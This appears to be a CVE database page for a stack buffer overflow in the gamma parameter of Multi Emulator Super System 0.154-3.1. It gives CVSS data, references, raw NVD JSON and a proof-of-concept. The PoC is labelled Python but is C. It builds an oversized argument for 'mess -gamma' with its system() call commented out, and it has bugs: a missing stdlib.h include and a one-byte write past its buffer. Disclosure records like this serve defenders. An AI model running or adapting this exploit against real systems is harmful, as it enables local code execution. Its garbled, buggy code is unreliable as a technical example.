CVE-2016-20039

Description

Multi Emulator Super System 0.154-3.1 contains a buffer overflow vulnerability in the gamma parameter handling that allows local attackers to crash the application or execute arbitrary code. Attackers can supply an oversized gamma parameter value to overflow the stack buffer and overwrite the instruction pointer with a controlled address to achieve code execution.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Multi Emulator Super System 0.154-3.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <stdio.h>
#include <string.h>

// PoC for CVE-2016-20039
// This script demonstrates how to trigger the buffer overflow
// by passing a large argument to the vulnerable application.

int main() {
    // Vulnerable command simulation
    char *cmd = "./mess";
    char *payload;
    int buffer_size = 512; // Example buffer size, adjust based on actual binary analysis
    int overwrite_size = buffer_size + 8; // Size to overflow and overwrite return address

    // Allocate memory for payload
    payload = (char *)malloc(overwrite_size);
    memset(payload, 'A', overwrite_size);
    payload[overwrite_size] = '\0';

    // Execute the vulnerable application with the malicious gamma parameter
    // In a real scenario, the syntax might be: mess -gamma [payload]
    char exec_command[1024];
    sprintf(exec_command, "%s -gamma %s", cmd, payload);
    
    printf("Executing command: %s\n", exec_command);
    // system(exec_command); // Uncomment to run
    
    free(payload);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2016-20039
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2016-20039
[3] CVE Details https://www.cvedetails.com/cve/CVE-2016-20039/
[4] VulDB https://vuldb.com/cve/CVE-2016-20039
[5] http://mamedev.org/
[6] https://www.exploit-db.com/exploits/39673
[7] https://www.vulncheck.com/advisories/multi-emulator-super-system-buffer-overflow

Raw JSON Data

JSON

{"cve": {"id": "CVE-2016-20039", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:15:59.473", "lastModified": "2026-03-30T13:26:07.647", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multi Emulator Super System 0.154-3.1 contains a buffer overflow vulnerability in the gamma parameter handling that allows local attackers to crash the application or execute arbitrary code. Attackers can supply an oversized gamma parameter value to overflow the stack buffer and overwrite the instruction pointer with a controlled address to achieve code execution."}, {"lang": "es", "value": "Multi Emulator Super System 0.154-3.1 contiene una vulnerabilidad de desbordamiento de búfer en el manejo del parámetro gamma que permite a atacantes locales bloquear la aplicación o ejecutar código arbitrario. Los atacantes pueden proporcionar un valor de parámetro gamma sobredimensionado para desbordar el búfer de la pila y sobrescribir el puntero de instrucción con una dirección controlada para lograr la ejecución de código."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "http://mamedev.org/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/39673", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/multi-emulator-super-system-buffer-overflow", "source": "[email protected]"}]}}